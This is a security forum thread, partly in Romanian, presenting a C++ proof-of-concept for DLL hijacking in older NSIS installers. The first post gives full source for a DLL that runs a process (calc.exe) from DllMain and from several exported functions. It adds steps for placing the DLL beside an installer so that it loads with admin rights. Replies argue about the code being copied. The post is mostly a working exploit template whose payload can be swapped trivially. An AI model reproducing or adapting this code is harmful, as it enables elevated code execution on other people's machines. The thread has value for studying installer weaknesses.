Jump to content
Jako

[C++] NSIS Installer DLL Hijack Vuln

Recommended Posts

// dllmain.cpp : Defines the entry point for the DLL application.
#include "stdafx.h"

DWORD go(void);

#define EX __declspec (dllexport)

EX void __cdecl DllInstall() { go(); }
EX void __cdecl DllRegisterServer() { go(); }
EX void __cdecl DllUnregisterServer() { go(); }
EX void __cdecl RunDLLW() { go(); }


STARTUPINFOA si;
PROCESS_INFORMATION pi;

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{

    RtlSecureZeroMemory(&si, sizeof(STARTUPINFOA));
    RtlSecureZeroMemory(&pi, sizeof(PROCESS_INFORMATION));


    switch (ul_reason_for_call)
    {
        
    case DLL_PROCESS_ATTACH:
        
        //    MessageBox(0, L"Hello", L"World", MB_OK);
        CreateProcessA("C:\\windows\\system32\\calc.exe", 0, 0, 0, 0, 0, 0, 0, &si, &pi);


    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

DWORD go(void) {


    //MessageBox(0, L"Hello", L"World", MB_OK);

    RtlSecureZeroMemory(&si, sizeof(STARTUPINFOA));
    RtlSecureZeroMemory(&pi, sizeof(PROCESS_INFORMATION));

    CreateProcessA("C:\\windows\\system32\\calc.exe", 0, 0, 0, 0, 0, 0, 0, &si, &pi);

    ExitProcess(0);
    return 0;
}

1. Compile code to a DLL

2. Put the DLL in the same folder as an old NSIS installer, double click the installer, accept the prompt for admin rights
The dll gets loaded at the same time.

One thing to remember when compiling this DLL. The entry point must point to DllMain();

Link to comment
Share on other sites

18 minutes ago, Jako said:

Nu e scris de mine, si daca ar fi n-ar conta. Iti multumesc pentru interventie si te rog frumos sa postezi tu o varianta mai buna.

Cum sa nu conteze? Daca te opresti sa copiezi cacaturi de la toti prostii, poate nu vei deveni ca ei.

Edited by Byte-ul
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...